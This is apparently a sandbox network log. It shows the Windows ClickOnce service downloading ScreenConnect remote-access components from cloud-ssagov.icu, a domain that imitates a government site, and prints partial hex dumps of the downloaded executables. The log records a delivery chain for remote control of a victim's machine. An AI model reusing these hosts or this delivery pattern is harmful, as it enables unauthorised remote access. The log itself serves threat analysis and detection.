2024-11-13 17:26:48 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:49 UTC	115	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:49 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:49 GMT Connection: close
2024-11-13 17:26:49 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:50 UTC	105	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:50 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81688 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:50 GMT Connection: close
2024-11-13 17:26:50 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f da 6f e6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 d5 24 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo"0@^ `@ `$@
2024-11-13 17:26:50 UTC	16384	IN	Data Raw: 00 29 01 00 24 39 37 33 35 31 30 64 62 2d 37 64 37 66 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 21 b6 ed 55 cc 1c 34 da a9 ba 26 c5 af c0 7a 8b c8 ec 9a 4e 15 f5 57 09 66 f8 54 1e 23 0d 46 8a d0 31 74 fa b5 ce cc c5 f3 48 33 d0 24 1c da b9 2c fd 8f cc 64 34 db dc 2b 01 3d 74 17 8f 7b 58 b2 b0 ad de f3 c1 b0 0d c4 c8 95 65 a5 c1 77 fc 36 28 c5 9d 46 a0 37 b1 94 f6 c6 b6 ea 45 c4 0a 6b d7 09 51 69 f7 bb fd d8 20 8a 15 e8 de 50 11 27 69 e2 f0 72 86 af 63 b6 44 86 66 ff d7 59 27 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: )$973510db-7d7f-452b-8975-74a85828d354TextState!U4&zNWfT#F1tH3$,d4+=t{Xew6(F7EkQi P'ircDfY'{^@
2024-11-13 17:26:51 UTC	16384	IN	Data Raw: f8 ff 52 ce fa ff 53 d0 fd ff 54 d1 fe ff 54 d2 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 Data Ascii: RSTTUUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQR
2024-11-13 17:26:51 UTC	16384	IN	Data Raw: ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 Data Ascii: fffffffffffffffffffggggggggggggggggggggggggggggggggggggggg
2024-11-13 17:26:51 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n
2024-11-13 17:26:51 UTC	2	IN	Data Raw: 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:52 UTC	94	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:52 UTC	236	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:51 GMT Connection: close
2024-11-13 17:26:52 UTC	16148	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 16 02 e0 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 7e 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 38 00 1b 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy" 0>~] ` 8@
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 70 17 8d 15 00 00 01 25 16 09 a2 28 00 02 00 0a 28 93 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a Data Ascii: p%((((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:(
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 00 04 1b 28 aa 01 00 06 7d fc 00 00 04 2b 2e 02 02 7b fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a Data Ascii: (}+.{}}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: f2 25 56 80 d4 15 f2 25 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 Data Ascii: %V%Tn"n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 00 00 00 00 c6 00 21 5b 10 00 0e 07 4b a5 00 00 00 00 c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 Data Ascii: ![K^S^'jr);z0;;'9;U9;X7=
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 52 0f 3b 10 44 04 5f 46 99 1a 3c 04 86 99 a0 02 3c 04 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d Data Ascii: R;D_F<<[4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuz
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 63 65 53 6f 75 72 63 65 73 3e 62 5f 5f 33 5f 31 00 3c 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f Data Ascii: ceSources>b__3_1<>9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveCo
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 6e 64 6c 65 00 77 69 6e 64 6f 77 48 61 6e 64 6c 65 00 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f Data Ascii: ndlewindowHandlebaseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFro
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 75 72 72 65 6e 74 54 68 72 65 61 64 44 65 73 6b 74 6f 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 Data Ascii: urrentThreadDesktop<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupf
2024-11-13 17:26:52 UTC	16384	IN	Data Raw: 72 43 72 65 61 74 65 52 65 67 69 73 74 72 79 4b 65 79 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e Data Ascii: rCreateRegistryKeyOpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdown

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	185.49.126.73	443	7076	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:26:55 UTC	100	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:26:55 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 602392 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:26:55 GMT Connection: close
2024-11-13 17:26:55 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db c1 bb 82 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 00 09 00 00 06 00 00 00 00 00 00 a2 19 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 0b 89 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 32 00 00 2b 28 ce 01 00 0a 0a 06 25 2d 06 26 7e b1 00 00 0a 2a 00 00 1b 30 06 00 20 0f 00 00 2c 00 00 11 73 b0 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 2a 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 55 0d 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 3b 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4f 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4f 06 00 06 13 08 11 04 7b 16 03 00 04 6f Data Ascii: 2+(%-&~0 ,s}(u,rp(v(w(x}H((((~%-&~s%(3+o8Uo}{(,+{o(;{o)(O{o*(O{o
2024-11-13 17:26:55 UTC	16384	IN	Data Raw: 26 7e 96 02 00 04 fe 06 62 07 00 06 73 d0 01 00 0a 25 80 e1 02 00 04 28 4b 00 00 2b 7d 72 03 00 04 06 7b 72 03 00 04 2c 60 06 7b 71 03 00 04 2c 47 06 7b 72 03 00 04 28 2c 00 00 2b 18 7d 78 02 00 04 06 fe 06 0e 08 00 06 73 b5 00 00 0a 14 28 b6 00 00 0a 26 06 7b 72 03 00 04 6f 16 03 00 06 06 7b 72 03 00 04 28 2c 00 00 2b 7b 78 02 00 04 19 fe 01 6f 10 03 00 0a 06 7b 72 03 00 04 28 2c 00 00 2b 16 7d 78 02 00 04 2a 00 13 30 03 00 43 00 00 00 46 00 00 11 02 03 28 b3 00 00 06 03 2d 21 02 7b 54 00 00 04 25 2d 04 26 16 2b 05 28 da 00 00 0a 2c 0d 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 03 2c 14 20 00 00 10 00 17 12 00 fe 15 c4 00 00 1b 06 28 09 06 00 06 2a 22 02 03 28 b1 00 00 06 2a a6 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 